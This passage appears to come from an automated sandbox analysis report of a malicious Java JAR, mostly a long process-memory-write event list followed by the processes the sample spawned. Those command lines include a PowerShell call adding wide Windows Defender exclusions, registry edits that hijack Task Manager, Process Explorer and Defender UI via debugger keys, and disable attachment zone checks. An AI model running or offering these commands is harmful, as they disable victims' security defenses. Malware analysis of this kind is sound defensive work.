wrote to memory of 1584 108 cmd.exe 184 PID 108 wrote to memory of 1584 108 cmd.exe 184 PID 108 wrote to memory of 1672 108 cmd.exe 185 PID 108 wrote to memory of 1672 108 cmd.exe 185 PID 108 wrote to memory of 1672 108 cmd.exe 185 PID 1104 wrote to memory of 1972 1104 java.exe 186 PID 1104 wrote to memory of 1972 1104 java.exe 186 PID 1104 wrote to memory of 1972 1104 java.exe 186 PID 1972 wrote to memory of 1572 1972 cmd.exe 187 PID 1972 wrote to memory of 1572 1972 cmd.exe 187 PID 1972 wrote to memory of 1572 1972 cmd.exe 187 PID 1972 wrote to memory of 872 1972 cmd.exe 188 PID 1972 wrote to memory of 872 1972 cmd.exe 188 PID 1972 wrote to memory of 872 1972 cmd.exe 188 PID 1104 wrote to memory of 1828 1104 java.exe 189 PID 1104 wrote to memory of 1828 1104 java.exe 189 PID 1104 wrote to memory of 1828 1104 java.exe 189 PID 1828 wrote to memory of 1988 1828 cmd.exe 190 PID 1828 wrote to memory of 1988 1828 cmd.exe 190 PID 1828 wrote to memory of 1988 1828 cmd.exe 190 PID 1828 wrote to memory of 528 1828 cmd.exe 191 PID 1828 wrote to memory of 528 1828 cmd.exe 191 PID 1828 wrote to memory of 528 1828 cmd.exe 191 PID 1104 wrote to memory of 1960 1104 java.exe 192 PID 1104 wrote to memory of 1960 1104 java.exe 192 PID 1104 wrote to memory of 1960 1104 java.exe 192 PID 1960 wrote to memory of 2540 1960 cmd.exe 193 PID 1960 wrote to memory of 2540 1960 cmd.exe 193 PID 1960 wrote to memory of 2540 1960 cmd.exe 193 PID 1960 wrote to memory of 560 1960 cmd.exe 194 PID 1960 wrote to memory of 560 1960 cmd.exe 194 PID 1960 wrote to memory of 560 1960 cmd.exe 194 PID 1104 wrote to memory of 1076 1104 java.exe 195 PID 1104 wrote to memory of 1076 1104 java.exe 195 PID 1104 wrote to memory of 1076 1104 java.exe 195 PID 1076 wrote to memory of 2528 1076 cmd.exe 196 PID 1076 wrote to memory of 2528 1076 cmd.exe 196 PID 1076 wrote to memory of 2528 1076 cmd.exe 196 PID 1076 wrote to memory of 792 1076 cmd.exe 197 PID 1076 wrote to memory of 792 1076 cmd.exe 197 PID 1076 wrote to memory of 792 1076 cmd.exe 197 PID 1104 wrote to memory of 2572 1104 java.exe 198 PID 1104 wrote to memory of 2572 1104 java.exe 198 PID 1104 wrote to memory of 2572 1104 java.exe 198 PID 2572 wrote to memory of 2584 2572 cmd.exe 199 PID 2572 wrote to memory of 2584 2572 cmd.exe 199 PID 2572 wrote to memory of 2584 2572 cmd.exe 199 PID 2572 wrote to memory of 2592 2572 cmd.exe 200 PID 2572 wrote to memory of 2592 2572 cmd.exe 200 PID 2572 wrote to memory of 2592 2572 cmd.exe 200 PID 1104 wrote to memory of 684 1104 java.exe 201 PID 1104 wrote to memory of 684 1104 java.exe 201 PID 1104 wrote to memory of 684 1104 java.exe 201 PID 684 wrote to memory of 2056 684 cmd.exe 202 PID 684 wrote to memory of 2056 684 cmd.exe 202 PID 684 wrote to memory of 2056 684 cmd.exe 202 PID 684 wrote to memory of 540 684 cmd.exe 203 PID 684 wrote to memory of 540 684 cmd.exe 203 PID 684 wrote to memory of 540 684 cmd.exe 203 PID 1104 wrote to memory of 2608 1104 java.exe 204 PID 1104 wrote to memory of 2608 1104 java.exe 204 PID 1104 wrote to memory of 2608 1104 java.exe 204 PID 2608 wrote to memory of 2248 2608 cmd.exe 205 PID 2608 wrote to memory of 2248 2608 cmd.exe 205 PID 2608 wrote to memory of 2248 2608 cmd.exe 205 PID 2608 wrote to memory of 2088 2608 cmd.exe 206 PID 2608 wrote to memory of 2088 2608 cmd.exe 206 PID 2608 wrote to memory of 2088 2608 cmd.exe 206 PID 1104 wrote to memory of 2216 1104 java.exe 207 PID 1104 wrote to memory of 2216 1104 java.exe 207 PID 1104 wrote to memory of 2216 1104 java.exe 207 PID 2216 wrote to memory of 2604 2216 cmd.exe 208 PID 2216 wrote to memory of 2604 2216 cmd.exe 208 PID 2216 wrote to memory of 2604 2216 cmd.exe 208 PID 2216 wrote to memory of 2652 2216 cmd.exe 209 PID 2216 wrote to memory of 2652 2216 cmd.exe 209 PID 2216 wrote to memory of 2652 2216 cmd.exe 209 PID 1104 wrote to memory of 2664 1104 java.exe 210 PID 1104 wrote to memory of 2664 1104 java.exe 210 PID 1104 wrote to memory of 2664 1104 java.exe 210 PID 2664 wrote to memory of 2660 2664 cmd.exe 211 PID 2664 wrote to memory of 2660 2664 cmd.exe 211 PID 2664 wrote to memory of 2660 2664 cmd.exe 211 PID 2664 wrote to memory of 2308 2664 cmd.exe 212 PID 2664 wrote to memory of 2308 2664 cmd.exe 212 PID 2664 wrote to memory of 2308 2664 cmd.exe 212 PID 1104 wrote to memory of 2280 1104 java.exe 213 PID 1104 wrote to memory of 2280 1104 java.exe 213 PID 1104 wrote to memory of 2280 1104 java.exe 213 PID 2280 wrote to memory of 2168 2280 cmd.exe 214 PID 2280 wrote to memory of 2168 2280 cmd.exe 214 PID 2280 wrote to memory of 2168 2280 cmd.exe 214 PID 2280 wrote to memory of 2692 2280 cmd.exe 215 PID 2280 wrote to memory of 2692 2280 cmd.exe 215 PID 2280 wrote to memory of 2692 2280 cmd.exe 215 PID 1104 wrote to memory of 2684 1104 java.exe 216 PID 1104 wrote to memory of 2684 1104 java.exe 216 PID 1104 wrote to memory of 2684 1104 java.exe 216 PID 2684 wrote to memory of 2724 2684 cmd.exe 217 PID 2684 wrote to memory of 2724 2684 cmd.exe 217 PID 2684 wrote to memory of 2724 2684 cmd.exe 217 PID 2684 wrote to memory of 2136 2684 cmd.exe 218 PID 2684 wrote to memory of 2136 2684 cmd.exe 218 PID 2684 wrote to memory of 2136 2684 cmd.exe 218 PID 1104 wrote to memory of 2756 1104 java.exe 219 PID 1104 wrote to memory of 2756 1104 java.exe 219 PID 1104 wrote to memory of 2756 1104 java.exe 219 PID 2756 wrote to memory of 2272 2756 cmd.exe 220 PID 2756 wrote to memory of 2272 2756 cmd.exe 220 PID 2756 wrote to memory of 2272 2756 cmd.exe 220 PID 2756 wrote to memory of 2232 2756 cmd.exe 221 PID 2756 wrote to memory of 2232 2756 cmd.exe 221 PID 2756 wrote to memory of 2232 2756 cmd.exe 221 PID 1104 wrote to memory of 2732 1104 java.exe 222 PID 1104 wrote to memory of 2732 1104 java.exe 222 PID 1104 wrote to memory of 2732 1104 java.exe 222 PID 2732 wrote to memory of 2744 2732 cmd.exe 223 PID 2732 wrote to memory of 2744 2732 cmd.exe 223 PID 2732 wrote to memory of 2744 2732 cmd.exe 223 PID 2732 wrote to memory of 2776 2732 cmd.exe 224 PID 2732 wrote to memory of 2776 2732 cmd.exe 224 PID 2732 wrote to memory of 2776 2732 cmd.exe 224 PID 1104 wrote to memory of 2768 1104 java.exe 225 PID 1104 wrote to memory of 2768 1104 java.exe 225 PID 1104 wrote to memory of 2768 1104 java.exe 225 PID 2768 wrote to memory of 2796 2768 cmd.exe 226 PID 2768 wrote to memory of 2796 2768 cmd.exe 226 PID 2768 wrote to memory of 2796 2768 cmd.exe 226 PID 2768 wrote to memory of 2820 2768 cmd.exe 227 PID 2768 wrote to memory of 2820 2768 cmd.exe 227 PID 2768 wrote to memory of 2820 2768 cmd.exe 227 PID 1104 wrote to memory of 2836 1104 java.exe 228 PID 1104 wrote to memory of 2836 1104 java.exe 228 PID 1104 wrote to memory of 2836 1104 java.exe 228 PID 2836 wrote to memory of 2860 2836 cmd.exe 229 PID 2836 wrote to memory of 2860 2836 cmd.exe 229 PID 2836 wrote to memory of 2860 2836 cmd.exe 229 PID 2836 wrote to memory of 2292 2836 cmd.exe 230 PID 2836 wrote to memory of 2292 2836 cmd.exe 230 PID 2836 wrote to memory of 2292 2836 cmd.exe 230 PID 1104 wrote to memory of 2288 1104 java.exe 231 PID 1104 wrote to memory of 2288 1104 java.exe 231 PID 1104 wrote to memory of 2288 1104 java.exe 231 PID 2288 wrote to memory of 2900 2288 cmd.exe 232 PID 2288 wrote to memory of 2900 2288 cmd.exe 232 PID 2288 wrote to memory of 2900 2288 cmd.exe 232 PID 2288 wrote to memory of 2104 2288 cmd.exe 233 PID 2288 wrote to memory of 2104 2288 cmd.exe 233 PID 2288 wrote to memory of 2104 2288 cmd.exe 233 PID 1104 wrote to memory of 2908 1104 java.exe 234 PID 1104 wrote to memory of 2908 1104 java.exe 234 PID 1104 wrote to memory of 2908 1104 java.exe 234 PID 2908 wrote to memory of 2924 2908 cmd.exe 235 PID 2908 wrote to memory of 2924 2908 cmd.exe 235 PID 2908 wrote to memory of 2924 2908 cmd.exe 235 PID 2908 wrote to memory of 1028 2908 cmd.exe 236 PID 2908 wrote to memory of 1028 2908 cmd.exe 236 PID 2908 wrote to memory of 1028 2908 cmd.exe 236 PID 1104 wrote to memory of 2936 1104 java.exe 237 PID 1104 wrote to memory of 2936 1104 java.exe 237 PID 1104 wrote to memory of 2936 1104 java.exe 237 PID 2936 wrote to memory of 2952 2936 cmd.exe 238 PID 2936 wrote to memory of 2952 2936 cmd.exe 238 PID 2936 wrote to memory of 2952 2936 cmd.exe 238 PID 2936 wrote to memory of 2980 2936 cmd.exe 239 PID 2936 wrote to memory of 2980 2936 cmd.exe 239 PID 2936 wrote to memory of 2980 2936 cmd.exe 239 PID 1104 wrote to memory of 2988 1104 java.exe 240 PID 1104 wrote to memory of 2988 1104 java.exe 240 PID 1104 wrote to memory of 2988 1104 java.exe 240 PID 2988 wrote to memory of 3012 2988 cmd.exe 241 PID 2988 wrote to memory of 3012 2988 cmd.exe 241 PID 2988 wrote to memory of 3012 2988 cmd.exe 241 PID 2988 wrote to memory of 2992 2988 cmd.exe 242 PID 2988 wrote to memory of 2992 2988 cmd.exe 242 PID 2988 wrote to memory of 2992 2988 cmd.exe 242 PID 1104 wrote to memory of 3036 1104 java.exe 243 PID 1104 wrote to memory of 3036 1104 java.exe 243 PID 1104 wrote to memory of 3036 1104 java.exe 243 PID 3036 wrote to memory of 3068 3036 cmd.exe 244 PID 3036 wrote to memory of 3068 3036 cmd.exe 244 PID 3036 wrote to memory of 3068 3036 cmd.exe 244 PID 3036 wrote to memory of 3024 3036 cmd.exe 245 PID 3036 wrote to memory of 3024 3036 cmd.exe 245 PID 3036 wrote to memory of 3024 3036 cmd.exe 245 PID 1104 wrote to memory of 3056 1104 java.exe 246 PID 1104 wrote to memory of 3056 1104 java.exe 246 PID 1104 wrote to memory of 3056 1104 java.exe 246 PID 3056 wrote to memory of 1196 3056 cmd.exe 247 PID 3056 wrote to memory of 1196 3056 cmd.exe 247 PID 3056 wrote to memory of 1196 3056 cmd.exe 247 PID 3056 wrote to memory of 3052 3056 cmd.exe 248 PID 3056 wrote to memory of 3052 3056 cmd.exe 248 PID 3056 wrote to memory of 3052 3056 cmd.exe 248 PID 1104 wrote to memory of 2032 1104 java.exe 249 PID 1104 wrote to memory of 2032 1104 java.exe 249 PID 1104 wrote to memory of 2032 1104 java.exe 249 PID 2032 wrote to memory of 2304 2032 cmd.exe 250 PID 2032 wrote to memory of 2304 2032 cmd.exe 250 PID 2032 wrote to memory of 2304 2032 cmd.exe 250 PID 2032 wrote to memory of 1224 2032 cmd.exe 251 PID 2032 wrote to memory of 1224 2032 cmd.exe 251 PID 2032 wrote to memory of 1224 2032 cmd.exe 251 PID 1104 wrote to memory of 796 1104 java.exe 252 PID 1104 wrote to memory of 796 1104 java.exe 252 PID 1104 wrote to memory of 796 1104 java.exe 252 PID 796 wrote to memory of 2372 796 cmd.exe 253 PID 796 wrote to memory of 2372 796 cmd.exe 253 PID 796 wrote to memory of 2372 796 cmd.exe 253 PID 796 wrote to memory of 2360 796 cmd.exe 254 PID 796 wrote to memory of 2360 796 cmd.exe 254 PID 796 wrote to memory of 2360 796 cmd.exe 254 PID 1104 wrote to memory of 2336 1104 java.exe 255 PID 1104 wrote to memory of 2336 1104 java.exe 255 PID 1104 wrote to memory of 2336 1104 java.exe 255 PID 2336 wrote to memory of 2884 2336 cmd.exe 256 PID 2336 wrote to memory of 2884 2336 cmd.exe 256 PID 2336 wrote to memory of 2884 2336 cmd.exe 256 PID 2336 wrote to memory of 2396 2336 cmd.exe 257 PID 2336 wrote to memory of 2396 2336 cmd.exe 257 PID 2336 wrote to memory of 2396 2336 cmd.exe 257 PID 1104 wrote to memory of 2880 1104 java.exe 258 PID 1104 wrote to memory of 2880 1104 java.exe 258 PID 1104 wrote to memory of 2880 1104 java.exe 258 PID 2880 wrote to memory of 2784 2880 cmd.exe 259 PID 2880 wrote to memory of 2784 2880 cmd.exe 259 PID 2880 wrote to memory of 2784 2880 cmd.exe 259 PID 2880 wrote to memory of 2728 2880 cmd.exe 260 PID 2880 wrote to memory of 2728 2880 cmd.exe 260 PID 2880 wrote to memory of 2728 2880 cmd.exe 260 PID 1104 wrote to memory of 2416 1104 java.exe 261 PID 1104 wrote to memory of 2416 1104 java.exe 261 PID 1104 wrote to memory of 2416 1104 java.exe 261 PID 2416 wrote to memory of 2460 2416 cmd.exe 262 PID 2416 wrote to memory of 2460 2416 cmd.exe 262 PID 2416 wrote to memory of 2460 2416 cmd.exe 262 PID 2416 wrote to memory of 2940 2416 cmd.exe 263 PID 2416 wrote to memory of 2940 2416 cmd.exe 263 PID 2416 wrote to memory of 2940 2416 cmd.exe 263 PID 1104 wrote to memory of 2848 1104 java.exe 264 PID 1104 wrote to memory of 2848 1104 java.exe 264 PID 1104 wrote to memory of 2848 1104 java.exe 264 PID 2848 wrote to memory of 2504 2848 cmd.exe 265 PID 2848 wrote to memory of 2504 2848 cmd.exe 265 PID 2848 wrote to memory of 2504 2848 cmd.exe 265 PID 2848 wrote to memory of 1812 2848 cmd.exe 266 PID 2848 wrote to memory of 1812 2848 cmd.exe 266 PID 2848 wrote to memory of 1812 2848 cmd.exe 266 PID 1104 wrote to memory of 656 1104 java.exe 267 PID 1104 wrote to memory of 656 1104 java.exe 267 PID 1104 wrote to memory of 656 1104 java.exe 267 PID 656 wrote to memory of 2384 656 cmd.exe 268 PID 656 wrote to memory of 2384 656 cmd.exe 268 PID 656 wrote to memory of 2384 656 cmd.exe 268 PID 656 wrote to memory of 1092 656 cmd.exe 269 PID 656 wrote to memory of 1092 656 cmd.exe 269 PID 656 wrote to memory of 1092 656 cmd.exe 269 PID 1104 wrote to memory of 1604 1104 java.exe 270 PID 1104 wrote to memory of 1604 1104 java.exe 270 PID 1104 wrote to memory of 1604 1104 java.exe 270 PID 1604 wrote to memory of 1844 1604 cmd.exe 271 PID 1604 wrote to memory of 1844 1604 cmd.exe 271 PID 1604 wrote to memory of 1844 1604 cmd.exe 271 PID 1604 wrote to memory of 1920 1604 cmd.exe 272 PID 1604 wrote to memory of 1920 1604 cmd.exe 272 PID 1604 wrote to memory of 1920 1604 cmd.exe 272 PID 1104 wrote to memory of 2400 1104 java.exe 273 PID 1104 wrote to memory of 2400 1104 java.exe 273 PID 1104 wrote to memory of 2400 1104 java.exe 273 PID 2400 wrote to memory of 1544 2400 cmd.exe 274 PID 2400 wrote to memory of 1544 2400 cmd.exe 274 PID 2400 wrote to memory of 1544 2400 cmd.exe 274 PID 2400 wrote to memory of 828 2400 cmd.exe 275 PID 2400 wrote to memory of 828 2400 cmd.exe 275 PID 2400 wrote to memory of 828 2400 cmd.exe 275 PID 1104 wrote to memory of 1144 1104 java.exe 276 PID 1104 wrote to memory of 1144 1104 java.exe 276 PID 1104 wrote to memory of 1144 1104 java.exe 276 PID 1144 wrote to memory of 2440 1144 cmd.exe 277 PID 1144 wrote to memory of 2440 1144 cmd.exe 277 PID 1144 wrote to memory of 2440 1144 cmd.exe 277 PID 1144 wrote to memory of 1968 1144 cmd.exe 278 PID 1144 wrote to memory of 1968 1144 cmd.exe 278 PID 1144 wrote to memory of 1968 1144 cmd.exe 278 PID 1104 wrote to memory of 1768 1104 java.exe 279 PID 1104 wrote to memory of 1768 1104 java.exe 279 PID 1104 wrote to memory of 1768 1104 java.exe 279 PID 1768 wrote to memory of 704 1768 cmd.exe 280 PID 1768 wrote to memory of 704 1768 cmd.exe 280 PID 1768 wrote to memory of 704 1768 cmd.exe 280 PID 1768 wrote to memory of 1916 1768 cmd.exe 281 PID 1768 wrote to memory of 1916 1768 cmd.exe 281 PID 1768 wrote to memory of 1916 1768 cmd.exe 281 PID 1104 wrote to memory of 2496 1104 java.exe 282 PID 1104 wrote to memory of 2496 1104 java.exe 282 PID 1104 wrote to memory of 2496 1104 java.exe 282 PID 2496 wrote to memory of 1988 2496 cmd.exe 283 PID 2496 wrote to memory of 1988 2496 cmd.exe 283 PID 2496 wrote to memory of 1988 2496 cmd.exe 283 PID 2496 wrote to memory of 528 2496 cmd.exe 284 PID 2496 wrote to memory of 528 2496 cmd.exe 284 PID 2496 wrote to memory of 528 2496 cmd.exe 284 PID 1104 wrote to memory of 2064 1104 java.exe 285 PID 1104 wrote to memory of 2064 1104 java.exe 285 PID 1104 wrote to memory of 2064 1104 java.exe 285 PID 2064 wrote to memory of 388 2064 cmd.exe 286 PID 2064 wrote to memory of 388 2064 cmd.exe 286 PID 2064 wrote to memory of 388 2064 cmd.exe 286 PID 2064 wrote to memory of 1660 2064 cmd.exe 287 PID 2064 wrote to memory of 1660 2064 cmd.exe 287 PID 2064 wrote to memory of 1660 2064 cmd.exe 287 PID 1104 wrote to memory of 1792 1104 java.exe 288 PID 1104 wrote to memory of 1792 1104 java.exe 288 PID 1104 wrote to memory of 1792 1104 java.exe 288 PID 1792 wrote to memory of 1976 1792 cmd.exe 289 PID 1792 wrote to memory of 1976 1792 cmd.exe 289 PID 1792 wrote to memory of 1976 1792 cmd.exe 289 PID 1792 wrote to memory of 1380 1792 cmd.exe 290 PID 1792 wrote to memory of 1380 1792 cmd.exe 290 PID 1792 wrote to memory of 1380 1792 cmd.exe 290 PID 1104 wrote to memory of 3008 1104 java.exe 291 PID 1104 wrote to memory of 3008 1104 java.exe 291 PID 1104 wrote to memory of 3008 1104 java.exe 291 PID 3008 wrote to memory of 1568 3008 cmd.exe 292 PID 3008 wrote to memory of 1568 3008 cmd.exe 292 PID 3008 wrote to memory of 1568 3008 cmd.exe 292 PID 3008 wrote to memory of 2524 3008 cmd.exe 293 PID 3008 wrote to memory of 2524 3008 cmd.exe 293 PID 3008 wrote to memory of 2524 3008 cmd.exe 293 PID 1104 wrote to memory of 2528 1104 java.exe 294 PID 1104 wrote to memory of 2528 1104 java.exe 294 PID 1104 wrote to memory of 2528 1104 java.exe 294 PID 2528 wrote to memory of 2588 2528 cmd.exe 295 PID 2528 wrote to memory of 2588 2528 cmd.exe 295 PID 2528 wrote to memory of 2588 2528 cmd.exe 295 PID 2528 wrote to memory of 2584 2528 cmd.exe 296 PID 2528 wrote to memory of 2584 2528 cmd.exe 296 PID 2528 wrote to memory of 2584 2528 cmd.exe 296 PID 1104 wrote to memory of 2580 1104 java.exe 297 PID 1104 wrote to memory of 2580 1104 java.exe 297 PID 1104 wrote to memory of 2580 1104 java.exe 297 PID 2580 wrote to memory of 2092 2580 cmd.exe 298 PID 2580 wrote to memory of 2092 2580 cmd.exe 298 PID 2580 wrote to memory of 2092 2580 cmd.exe 298 PID 2580 wrote to memory of 2612 2580 cmd.exe 299 PID 2580 wrote to memory of 2612 2580 cmd.exe 299 PID 2580 wrote to memory of 2612 2580 cmd.exe 299 PID 1104 wrote to memory of 2644 1104 java.exe 300 PID 1104 wrote to memory of 2644 1104 java.exe 300 PID 1104 wrote to memory of 2644 1104 java.exe 300 PID 2644 wrote to memory of 2080 2644 cmd.exe 301 PID 2644 wrote to memory of 2080 2644 cmd.exe 301 PID 2644 wrote to memory of 2080 2644 cmd.exe 301 PID 2644 wrote to memory of 2068 2644 cmd.exe 302 PID 2644 wrote to memory of 2068 2644 cmd.exe 302 PID 2644 wrote to memory of 2068 2644 cmd.exe 302 PID 1104 wrote to memory of 2668 1104 java.exe 303 PID 1104 wrote to memory of 2668 1104 java.exe 303 PID 1104 wrote to memory of 2668 1104 java.exe 303 PID 2668 wrote to memory of 2652 2668 cmd.exe 304 PID 2668 wrote to memory of 2652 2668 cmd.exe 304 PID 2668 wrote to memory of 2652 2668 cmd.exe 304 PID 2668 wrote to memory of 2700 2668 cmd.exe 305 PID 2668 wrote to memory of 2700 2668 cmd.exe 305 PID 2668 wrote to memory of 2700 2668 cmd.exe 305 PID 1104 wrote to memory of 2188 1104 java.exe 306 PID 1104 wrote to memory of 2188 1104 java.exe 306 PID 1104 wrote to memory of 2188 1104 java.exe 306 PID 2188 wrote to memory of 2208 2188 cmd.exe 307 PID 2188 wrote to memory of 2208 2188 cmd.exe 307 PID 2188 wrote to memory of 2208 2188 cmd.exe 307 PID 2188 wrote to memory of 2708 2188 cmd.exe 308 PID 2188 wrote to memory of 2708 2188 cmd.exe 308 PID 2188 wrote to memory of 2708 2188 cmd.exe 308 PID 1104 wrote to memory of 2692 1104 java.exe 309 PID 1104 wrote to memory of 2692 1104 java.exe 309 PID 1104 wrote to memory of 2692 1104 java.exe 309 PID 2692 wrote to memory of 2712 2692 cmd.exe 310 PID 2692 wrote to memory of 2712 2692 cmd.exe 310 PID 2692 wrote to memory of 2712 2692 cmd.exe 310 PID 2692 wrote to memory of 2148 2692 cmd.exe 311 PID 2692 wrote to memory of 2148 2692 cmd.exe 311 PID 2692 wrote to memory of 2148 2692 cmd.exe 311 PID 1104 wrote to memory of 1700 1104 java.exe 312 PID 1104 wrote to memory of 1700 1104 java.exe 312 PID 1104 wrote to memory of 1700 1104 java.exe 312 PID 1700 wrote to memory of 2028 1700 cmd.exe 313 PID 1700 wrote to memory of 2028 1700 cmd.exe 313 PID 1700 wrote to memory of 2028 1700 cmd.exe 313 PID 1700 wrote to memory of 1480 1700 cmd.exe 314 PID 1700 wrote to memory of 1480 1700 cmd.exe 314 PID 1700 wrote to memory of 1480 1700 cmd.exe 314 PID 1104 wrote to memory of 744 1104 java.exe 315 PID 1104 wrote to memory of 744 1104 java.exe 315 PID 1104 wrote to memory of 744 1104 java.exe 315 PID 744 wrote to memory of 2252 744 cmd.exe 316 PID 744 wrote to memory of 2252 744 cmd.exe 316 PID 744 wrote to memory of 2252 744 cmd.exe 316 PID 744 wrote to memory of 2232 744 cmd.exe 317 PID 744 wrote to memory of 2232 744 cmd.exe 317 PID 744 wrote to memory of 2232 744 cmd.exe 317 PID 1104 wrote to memory of 2752 1104 java.exe 318 PID 1104 wrote to memory of 2752 1104 java.exe 318 PID 1104 wrote to memory of 2752 1104 java.exe 318 PID 2752 wrote to memory of 2772 2752 cmd.exe 319 PID 2752 wrote to memory of 2772 2752 cmd.exe 319 PID 2752 wrote to memory of 2772 2752 cmd.exe 319 PID 2752 wrote to memory of 1840 2752 cmd.exe 320 PID 2752 wrote to memory of 1840 2752 cmd.exe 320 PID 2752 wrote to memory of 1840 2752 cmd.exe 320 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1820 attrib.exe 1768 attrib.exe 1716 attrib.exe 1836 attrib.exe 1844 attrib.exe 1376 attrib.exe 1812 attrib.exe 1796 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\PI_revisado.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:908
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1716
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1836
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\TKnJu\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1844
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\TKnJu\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1376
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\TKnJu2⤵
- Views/modifies file attributes
PID:1812
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\TKnJu2⤵
- Views/modifies file attributes
PID:1796
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\TKnJu2⤵
- Views/modifies file attributes
PID:1820
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\TKnJu\nfOlo.class2⤵
- Views/modifies file attributes
PID:1768
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:2036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\TKnJu','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\TKnJu\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1540
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1888
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1892
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1972
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1480
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:268
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:812
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1088
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1236
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1960
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1508
-
-
